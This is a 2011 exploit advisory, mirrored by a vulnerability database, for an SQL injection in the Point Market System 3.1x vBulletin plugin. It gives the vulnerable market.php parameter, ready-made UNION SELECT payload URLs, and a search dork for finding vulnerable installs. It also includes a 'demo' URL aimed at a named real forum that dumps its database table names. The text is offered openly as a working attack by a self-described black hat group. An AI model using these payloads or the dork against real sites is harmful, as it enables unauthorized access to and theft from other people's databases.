Lucene search
K

Point Market System 3.1x SQL Injection

🗓️ 10 Apr 2011 00:00:00Reported by Net.Edit0rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

Point Market System 3.1x vbulletin plugin SQL Injection Vulnerability

Code
`#(+)Exploit Title: Point Market System 3.1x vbulletin plugin SQL  
Injection Vulnerability  
#(+)Author : Net.Edit0r  
#(+) E-mail : [email protected]  
#(+) dork : intext:Point Market System 3.1x  
#(+) Versian : [3.1x]  
#(+) Category : Web Apps [SQl]  
#(+) Platform : Tested on: linux  
#(+) Download plugin : http://www.megaupload.com/?d=2R592KO0  
  
____________________________________________________________________  
____________________________________________________________________  
  
You must register on the site !  
  
The security problem in the file "market.Php" has been created. You  
can disable this security problem Plagn take it away.  
  
[~] Vulnerable File :  
  
# [+]http://localhost.com/market.php?do=cat&id=[SQL]  
  
[~] SQL injection Vulnerability  
  
# [+]-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--  
  
# [+]http://localhost.com/market.php?do=cat&id=-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--  
  
[~] Demo and Vedio :  
  
http://www.ehoza.com/v4/forum/market.php?do=cat&id=-1+union+select+1,group_concat%28table_name%29,3,4,5,6,@@version,8,9,10,11,12,13+from+information_schema.tables--  
  
Vedio : http://www.multiupload.com/S28Z2FCZQD  
  
[~] Full Info plugin Point Market  
  
http://www.vbulletin.org/forum/showthread.php?p=2159503#post2159503  
  
____________________________________________________________________  
____________________________________________________________________  
  
########################################################################  
(+)IRANIAN Young HackerZ # Persian Gulf  
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &  
3H34N & D3adly #BHG  
(+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ Virangar ~ S3cR3T ~ M4hd1  
~ Mikili ~ P0W3RFU7 ~ Ali.Erroor and all Friends  
(+)Gr33ts to : All Iranian HackerZ  
########################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation